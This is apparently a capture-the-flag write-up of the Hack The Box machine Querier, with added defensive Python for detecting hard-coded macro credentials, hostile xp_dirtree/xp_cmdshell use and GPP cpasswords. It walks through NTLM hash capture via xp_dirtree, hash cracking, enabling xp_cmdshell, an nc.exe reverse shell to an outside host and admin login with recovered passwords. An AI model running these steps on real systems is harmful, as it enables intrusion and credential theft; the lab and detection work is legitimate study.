Querier

1. Reconnaissance

1.1. nmap

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# nmap -sC -sV 10.129.52.220 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 08:54 +04
Warning: 10.129.52.220 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.129.52.220
Host is up (0.19s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2026-01-03T04:55:34+00:00; 0s from scanner time.
| ms-sql-info: 
|   10.129.52.220:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.52.220:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-03T04:52:58
|_Not valid after:  2056-01-03T04:52:58
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47559/tcp filtered unknown
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-01-03T04:55:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.26 seconds

1.2. SMB enumeration

I don't know why smbclient -N -L doesn't work, but after checking other references I confirmed that a Reports share exists and connect to that directory. Then download Currency Volume Report.xlsm.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# smbclient -N \\\\10.129.52.224\\Reports
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 03:23:48 2019
  ..                                  D        0  Tue Jan 29 03:23:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 02:21:34 2019

                5158399 blocks of size 4096. 850222 blocks available
smb: \> get "Currency Volume Report.xlsm" 
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (13.8 KiloBytes/sec) (average 13.8 KiloBytes/sec)
smb: \> 

2. Foothold

2.1. Enumerating the xlsm file

Since the xlsm file from Windows cannot be opened on Linux as-is, install oletools and use it.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# sudo -H pip install -U oletools[full] --break-system-packages
Requirement already satisfied: oletools[full] in /usr/local/lib/python3.13/dist-packages (0.60.2)
Requirement already satisfied: pyparsing<4,>=2.1.0 in /usr/lib/python3/dist-packages (from oletools[full]) (3.1.2)
Requirement already satisfied: olefile>=0.46 in /usr/lib/python3/dist-packages (from oletools[full]) (0.47)
Requirement already satisfied: easygui in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (0.98.3)
Requirement already satisfied: colorclass in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (2.2.2)
Requirement already satisfied: pcodedmp>=1.2.5 in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (1.2.6)
Requirement already satisfied: msoffcrypto-tool in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (5.4.2)
Collecting XLMMacroDeobfuscator (from oletools[full])
  Downloading XLMMacroDeobfuscator-0.2.7-py3-none-any.whl.metadata (9.3 kB)

[...SNIP...]

Opening the file with olevba then produces the output below. The macro's connection string contains the username reporting and the password PcwTWTHRwryjc$c6.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# olevba Currency\ Volume\ Report.xlsm 
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.13.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

 macro to pull data for client volume reports

 further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+
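The credential leak above is a classic one: a hard-coded ODBC connection string in a macro. The following Python is an added example (not part of this writeup and not an oletools feature): given macro text of the kind olevba prints, it extracts quoted connection strings, parses them key=value (handling brace-wrapped values such as Driver={SQL Server}), and reports any that carry a Pwd/Password, with the secret redacted so the finding can be filed without copying the password around. The sample macro, the host DBHOST01 and the password in it are constructed.

```python
"""Find plaintext credentials in VBA macro source (added example, not from the writeup).

Feed it the macro text olevba prints; it pulls quoted connection strings out of
the code, parses them key=value, and reports any carrying Pwd/Password with the
secret redacted so the report itself can be shared safely.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SECRET_KEYS = ("pwd", "password")
USER_KEYS = ("uid", "user id", "user")
# A double-quoted VBA string literal that looks like an ODBC / OLE DB connection string.
CONN_STRING_RE = re.compile(
    r'"([^"\n]*\b(?:Driver|Provider|Server|Data Source)=[^"\n]*)"', re.IGNORECASE
)


@dataclass
class Finding:
    line: int
    server: Optional[str]
    user: Optional[str]
    secret_key: str
    windows_auth: bool   # Trusted_Connection=yes means Uid/Pwd are ignored, but still exposed
    redacted: str        # connection string with the secret value replaced


def parse_connection_string(text: str) -> Dict[str, str]:
    """Split 'Key=Value;Key2={Value;with;semicolons}' into a dict with lowercased keys.
    Brace-wrapped values may contain semicolons (e.g. Driver={SQL Server})."""
    result: Dict[str, str] = {}
    i, n = 0, len(text)
    while i < n:
        eq = text.find("=", i)
        if eq == -1:
            break
        key = text[i:eq].strip().lower()
        j = eq + 1
        if j < n and text[j] == "{":
            close = text.find("}", j)
            close = n if close == -1 else close
            value = text[j + 1:close]
            sep = text.find(";", close)
        else:
            sep = text.find(";", j)
            value = text[j:sep if sep != -1 else n].strip()
        if key:
            result[key] = value
        i = n if sep == -1 else sep + 1
    return result


def find_embedded_credentials(vba_source: str) -> List[Finding]:
    """Scan every line (commented-out code included: a leaked password is a leak either way)."""
    findings: List[Finding] = []
    for lineno, line in enumerate(vba_source.splitlines(), start=1):
        for match in CONN_STRING_RE.finditer(line):
            raw = match.group(1)
            parts = parse_connection_string(raw)
            for key in SECRET_KEYS:
                if parts.get(key):
                    user = next((parts[u] for u in USER_KEYS if u in parts), None)
                    redacted = re.sub(rf"\b({re.escape(key)}\s*=)[^;]*", r"\1***",
                                      raw, flags=re.IGNORECASE)
                    findings.append(Finding(
                        line=lineno,
                        server=parts.get("server") or parts.get("data source"),
                        user=user,
                        secret_key=key,
                        windows_auth=parts.get("trusted_connection", "").lower() == "yes",
                        redacted=redacted,
                    ))
    return findings


# Constructed sample macro text (host and password are placeholders, not the target's).
SAMPLE_VBA = r"""
' macro to pull data for client volume reports
Private Sub Connect()
Dim conn As ADODB.Connection
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=DBHOST01;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=ExamplePassw0rd!"
conn.Open
End Sub
"""

if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_VBA):
        print(f"line {f.line}: user={f.user} server={f.server} -> {f.redacted}")
```

The durable fix is the one the macro's own Trusted_Connection=no hints at: use Windows authentication (Trusted_Connection=yes) or a credential store instead of a password baked into a workbook that is then dropped on an anonymously readable share.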

2.2. Accessing the reporting account with mssqlclient

Try connecting with mssqlclient using the reporting account obtained earlier.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.129.52.224 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\reporting  reporting@volume)> 

Trying to run a Windows command through xp_cmdshell fails because the account lacks the permission.

SQL (QUERIER\reporting  reporting@volume)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

2.3. Capturing the mssql-svc account

Since Windows commands cannot be run, capture the hash of the MSSQL service account instead by making it access a share.

┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0       
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.6.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

Access a share through EXEC master..xp_dirtree, pointing it at a share that does not actually exist. Writing it as \\10.10.14.143\a lets Responder catch the hash.

SQL (QUERIER\reporting  reporting@volume)> EXEC master..xp_dirtree '\\10.10.14.143\a';
subdirectory   depth   
------------   -----   

The hash then shows up in Responder.

[+] Listening for events...                                                                                                                                                                         

[SMB] NTLMv2-SSP Client   : 10.129.52.224
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:d95592c76c7e2cb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

Crack the captured hash with hashcat. This yields the password corporate568.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# hashcat hash /usr/share/wordlists/rockyou.txt         
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MSSQL-SVC::QUERIER:d95592c76c7e2cb5:4f624b4c89031056ab0da2503b4f30f9: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:corporate568

[...SNIP...]

2.4. Getting a Windows shell via the mssql-svc account

Connecting with mssqlclient as the mssql-svc account, the login succeeds.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# impacket-mssqlclient mssql-svc:'corporate568'@10.129.52.224 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc  dbo@master)> 

Running a Windows command such as whoami through xp_cmdshell as before, the error now says blocked rather than denied, which suggests it can be made to work.

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

After enabling xp_cmdshell with enable_xp_cmdshell and trying again, Windows commands run normally.

SQL (QUERIER\mssql-svc  dbo@master)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell whoami
output              
-----------------   
querier\mssql-svc   

NULL               
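Both steps that turned the reporting login into a shell, the xp_dirtree call to an outside UNC path in 2.3 and the sp_configure change that switches xp_cmdshell on here, are visible at the statement level. The following Python is an added detection example, not part of this writeup: it runs over constructed SQL Server statement-audit lines (the "timestamp login= db= stmt=" layout is assumed for the example, not a real SQL Server log format; map SQL Audit or Extended Events output onto these fields first) and flags xp_dirtree/xp_fileexist/xp_subdirs calls whose UNC host is outside an allowlist, plus any sp_configure statement enabling xp_cmdshell. The allowlist, the host name fileserver01 and the sample lines are constructed.

```python
"""Detection over SQL Server statement audit lines (added example, not from the writeup).

The audit line layout "<timestamp> login=<login> db=<database> stmt=<T-SQL>" is a
constructed format; map a real source (SQL Audit, Extended Events) onto these
fields before use. Allowlists below are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# Constructed allowlist: file servers the database engine is expected to reach over UNC.
TRUSTED_NETWORKS = [ipaddress.ip_network("10.129.0.0/16")]
TRUSTED_HOSTS = {"fileserver01"}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+db=(?P<db>\S+)\s+stmt=(?P<stmt>.*)$")
# Extended procedures that take a path and authenticate to a UNC target as the service account.
UNC_PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.IGNORECASE)
# Host part of a UNC path: two backslashes, host, backslash.
UNC_HOST_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")
CMDSHELL_ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*'?1'?", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    login: str
    detail: str


def host_is_trusted(host: str) -> bool:
    """IP literals are checked against trusted networks, names against the host allowlist."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in TRUSTED_HOSTS
    return any(ip in net for net in TRUSTED_NETWORKS)


def analyze_audit_lines(lines: List[str]) -> List[Alert]:
    alerts: List[Alert] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an audit line in the assumed layout
        login, stmt = m["login"], m["stmt"]
        if UNC_PROC_RE.search(stmt):
            for host in UNC_HOST_RE.findall(stmt):
                if not host_is_trusted(host):
                    alerts.append(Alert("unc-path-to-untrusted-host", login, host))
        if CMDSHELL_ENABLE_RE.search(stmt):
            alerts.append(Alert("xp_cmdshell-enabled", login, stmt.strip()))
    return alerts


# Constructed sample audit lines (not real logs from the target).
SAMPLE_LINES = [
    r"2026-01-03T04:55:00Z login=QUERIER\reporting db=volume stmt=SELECT * FROM volume;",
    r"2026-01-03T04:55:10Z login=QUERIER\reporting db=volume stmt=EXEC master..xp_dirtree '\\fileserver01\reports';",
    r"2026-01-03T04:55:20Z login=QUERIER\reporting db=volume stmt=EXEC master..xp_dirtree '\\10.10.14.143\a';",
    r"2026-01-03T04:58:00Z login=QUERIER\mssql-svc db=master stmt=exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    r"2026-01-03T04:58:05Z login=QUERIER\mssql-svc db=master stmt=EXEC master..xp_fileexist '\\10.129.52.230\backup\x.bak';",
]

if __name__ == "__main__":
    for a in analyze_audit_lines(SAMPLE_LINES):
        print(f"[{a.rule}] {a.login}: {a.detail}")
```

Two of the five constructed lines fire: the xp_dirtree call to 10.10.14.143 and the sp_configure change, both attributable to a login. The reason the first one matters is that the engine authenticates to the UNC target as its service account, so a crackable service-account password (here one found in rockyou.txt) turns a low-privileged SQL login into that account; a managed service account or a long random password removes that step even where the outbound SMB cannot be blocked.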

Since Windows commands work, a reverse shell should be possible. So serve nc.exe through smbserver and send a reverse shell command.

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell //10.10.14.143/share/nc.exe -e cmd.exe 10.10.14.143 443
output   
------   
NULL     

Listen on port 443 on Kali and the shell comes in.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# rlwrap -cAr nc -lnvp 443

listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.52.224] 49681
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc

C:\Windows\system32>

Then mssql-svc

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 35CB-DA81

 Directory of C:\Users

01/28/2019  11:41 PM    <DIR>          .
01/28/2019  11:41 PM    <DIR>          ..
01/28/2019  10:17 PM    <DIR>          Administrator
01/28/2019  11:42 PM    <DIR>          mssql-svc
01/28/2019  10:17 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   3,476,443,136 bytes free

C:\Users>cd mssql-svc
cd mssql-svc

C:\Users\mssql-svc>cd Desktop
cd Desktop

C:\Users\mssql-svc\Desktop>type user.txt
type user.txt

3. Privilege escalation

3.1. Using powerup.ps1

Aim for privilege escalation using powerup.ps1.

C:\Users\mssql-svc\Desktop>cd ..\appdata\local\temp

cd ..\appdata\local\temp

C:\Users\mssql-svc\AppData\Local\Temp>xcopy \\10.10.14.143\share\powerup.ps1 .
xcopy \\10.10.14.143\share\powerup.ps1 .
\\10.10.14.143\share\powerup.ps1
1 File(s) copied

Running the script shows a plaintext password under the Passwords field.

C:\Users\mssql-svc\AppData\Local\Temp>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\mssql-svc\AppData\Local\Temp> . .\powerup.ps1 
. .\powerup.ps1 
PS C:\Users\mssql-svc\AppData\Local\Temp> Invoke-AllChecks
Invoke-AllChecks


Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2456
ProcessId   : 4380
Name        : 4380
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files
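The "Cached GPP Files" hit is the decisive one. Group Policy Preferences XML files (Groups.xml, but also ScheduledTasks.xml, Services.xml, DataSources.xml and Drives.xml) store account passwords in a cpassword attribute encrypted with a key Microsoft published, which is why the MS14-025 update removed the ability to set them; any copy of the file, including the local history cache under ProgramData that PowerUp read here, yields the plaintext. The following Python is an added example, not from the writeup or from PowerUp: it audits GPP XML text or a directory tree and reports every preference that still carries a non-empty cpassword, so the preference can be deleted and the account rotated. The sample Groups.xml, its clsid/uid values and the cpassword value are constructed placeholders.

```python
"""Audit Group Policy Preferences XML for cached cpassword values (added example, not from the writeup).

Scans XML text or a directory tree (a SYSVOL export, or a client's local GPP
history cache) and reports every Properties element with a non-empty cpassword.
The fix is to remove the preference and rotate the account; the value is
recoverable by anyone who can read the file, so protecting the file is not enough.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional


@dataclass
class GppFinding:
    source: str               # file path, or a label for in-memory text
    element: str              # tag of the element owning the preference (User, Group, Task, ...)
    user_name: Optional[str]
    new_name: Optional[str]
    changed: Optional[str]    # when the preference was last edited, if recorded
    never_expires: bool


def audit_gpp_xml(xml_text: str, source: str = "<memory>") -> List[GppFinding]:
    findings: List[GppFinding] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings  # malformed file: nothing to assert about it here
    for parent in root.iter():
        for props in parent:
            # GPP keeps the secret on the Properties child of the preference element.
            if props.tag == "Properties" and props.get("cpassword"):
                findings.append(GppFinding(
                    source=source,
                    element=parent.tag,
                    user_name=props.get("userName") or props.get("runAs") or props.get("accountName"),
                    new_name=props.get("newName") or None,
                    changed=parent.get("changed"),
                    never_expires=props.get("neverExpires") == "1",
                ))
    return findings


def audit_gpp_tree(root_dir: Path) -> List[GppFinding]:
    """Walk a directory (e.g. a SYSVOL copy or a local GPP history cache) and audit every .xml file."""
    findings: List[GppFinding] = []
    for path in sorted(root_dir.rglob("*.xml")):
        findings.extend(audit_gpp_xml(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings


# Constructed sample modelled on a Groups.xml preference; clsid, uid and cpassword are placeholders.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-GROUPS-CLSID}">
  <User clsid="{CONSTRUCTED-USER-CLSID}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="" fullName="" description="" cpassword="CONSTRUCTED_CPASSWORD_PLACEHOLDER=" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator"/>
  </User>
  <Group clsid="{CONSTRUCTED-GROUP-CLSID}" name="Backup Operators" changed="2019-01-28 23:14:02">
    <Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupName="Backup Operators"/>
  </Group>
</Groups>
"""

if __name__ == "__main__":
    for f in audit_gpp_xml(SAMPLE_GROUPS_XML, "Groups.xml (constructed)"):
        print(f"{f.source}: {f.element} {f.user_name!r} changed={f.changed} neverExpires={f.never_expires}")
```

Only the User preference is reported; the Group preference has no cpassword and is left alone. Point audit_gpp_tree at a copy of SYSVOL to find every policy that still sets a password, and remember that removing the preference does not remove cached copies already sitting on clients, nor does it change a password that has been exposed for years, so the account rotation is the part that actually closes the hole.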

Logging in with evil-winrm succeeds.

┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# evil-winrm -i 10.129.52.224 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'                                    
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt